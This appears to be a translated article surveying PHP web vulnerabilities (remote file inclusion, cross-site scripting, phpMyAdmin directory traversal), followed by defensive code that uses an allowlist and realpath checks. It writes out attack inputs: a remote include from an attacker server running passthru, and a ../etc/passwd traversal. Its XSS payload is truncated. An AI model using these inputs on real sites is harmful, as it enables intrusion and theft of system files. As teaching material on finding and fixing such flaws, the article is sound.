SoFunction
Updated on 2025-04-13

Summary of vulnerabilities in PHP script website

Source: http://xiaomutou./ciker/blog/

From today's network security perspective, the WEB page vulnerabilities that receive the most attention and exposure are those in ASP. Xiaozhu is the expert in that area and I have no say in it. PHP, however, also has serious security problems, yet there are not many articles about them. So here, let's discuss the vulnerabilities of PHP pages together.


I have summarized the PHP vulnerabilities that are common at present; they fall roughly into the following types: file inclusion vulnerabilities, script command execution vulnerabilities, file leakage vulnerabilities, SQL injection vulnerabilities, and so on. Common techniques such as COOKIE spoofing are not discussed here, since there is plenty of material about them on the Internet. So, let's analyze how these vulnerabilities are exploited one by one!


First, let's discuss the file inclusion vulnerability. It should be considered unique to PHP. It arises when data supplied from outside is not processed carefully enough, which lets a remote attacker execute arbitrary commands on the system with the permissions of the WEB process. Let's look at an example. Assume a page contains code like this:
<?php
// $include is meant to be a fixed path, but nothing checks where its value came from
include($include."/");
?>
In this code, $include is normally a path that the page has set in advance, but we can construct a path ourselves to carry out the attack. For example, we submit ?include=http://web/, where web is a server we control that serves the code used for the attack; that code can contain something like passthru("/bin/ls /etc"); so that commands of our choosing are executed. (Note: the server that hosts this file must not execute PHP code itself, otherwise the file is run there instead of being delivered as source; for details, see <<How to attack common vulnerabilities in PHP programs>>.) Many products have had this kind of problem, for example: PayPal Store Front, HotNews, Mambo Open Source, PhpDig, YABB SE, phpBB, InvisionBoard, SOLMETRA SPAW Editor, Les Visiteurs, PhpGedView, X-Cart, etc.


Next, let's look at the script command execution vulnerability. It arises when the URI parameters submitted by the user are not filtered sufficiently: submitting data that contains malicious HTML code can trigger a cross-site scripting attack and may obtain sensitive information from the target user. Here is an example: pages in PHP Transparent on PHP versions below 4.3.1 do not filter PHPSESSID sufficiently, and code such as the following achieves the attack:
http://web/?PHPSESSID=">
Within the script, we can construct functions that obtain some sensitive information from the user. There are relatively few products with this vulnerability; besides PHP Transparent there are PHP-Nuke, phpBB, PHP Classifieds, PHPix, Ultimate PHP Board, etc.


Then, let's look at the file leakage vulnerability. It arises when the parameters submitted by the user are not filtered sufficiently, so a remote attacker can perform a directory traversal attack and obtain sensitive information. Take the recently discovered phpMyAdmin case as an example. In phpMyAdmin, the page does not fully filter the 'what' parameter submitted by the user; if a remote attacker submits data containing several '../' sequences, he can escape the WEB ROOT restriction and, with the WEB process's permissions, view any file on the system. For example, an address such as: ?what=../../../../../etc/passwd
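To show how the two parameter-handling mistakes above are fixed, here is an added example of mine; it is not code from the original article or from any of the products it names. It assumes a hypothetical page that picks a template with ?include= and a viewer that picks a file with ?what= (the parameter names come from the article; the modules/ and docs/ directories and the function names are assumed).

```php
<?php
// Added example: hardened handling of the two request parameters
// discussed above (?include= and ?what=). Names are hypothetical.

// 1. Including a file named by the request.
//    Vulnerable pattern from the article: include($include . "/...");
//    With register_globals on, or a direct $_GET read, $include can be
//    "http://web/" (remote include) or "../../etc/passwd".
//    Fix: never build the include path from the request. Map the value
//    onto a fixed allowlist of modules and include only those.
function loadModule(string $requested): string
{
    $allowed = [
        'home' => __DIR__ . '/modules/home.php',
        'news' => __DIR__ . '/modules/news.php',
    ];
    if (!array_key_exists($requested, $allowed)) {
        return $allowed['home'];   // unknown value: fall back, never echo it
    }
    return $allowed[$requested];
}

// 2. Reading a file named by the request (the phpMyAdmin 'what' case).
//    Stripping "../" is not enough (e.g. "....//" survives one pass).
//    Fix: resolve the final path with realpath() and require that it
//    still lies under the intended directory.
function resolveViewPath(string $baseDir, string $what): ?string
{
    $base      = realpath($baseDir);
    $candidate = realpath($baseDir . '/' . $what);
    if ($base === false || $candidate === false) {
        return null;               // base missing or file does not exist
    }
    // realpath() has collapsed every "../"; the prefix check is now reliable.
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;               // resolved outside the base directory
    }
    return $candidate;
}

// Usage: the request value never reaches include or readfile unchecked.
$module = loadModule($_GET['include'] ?? 'home');
include $module;

$path = resolveViewPath(__DIR__ . '/docs', $_GET['what'] ?? '');
if ($path === null) {
    http_response_code(400);
    exit('invalid file');
}
readfile($path);
```

With this layout, ?include=http://web/ and ?what=../../../../../etc/passwd both end in the fallback or a 400 response instead of reaching the filesystem.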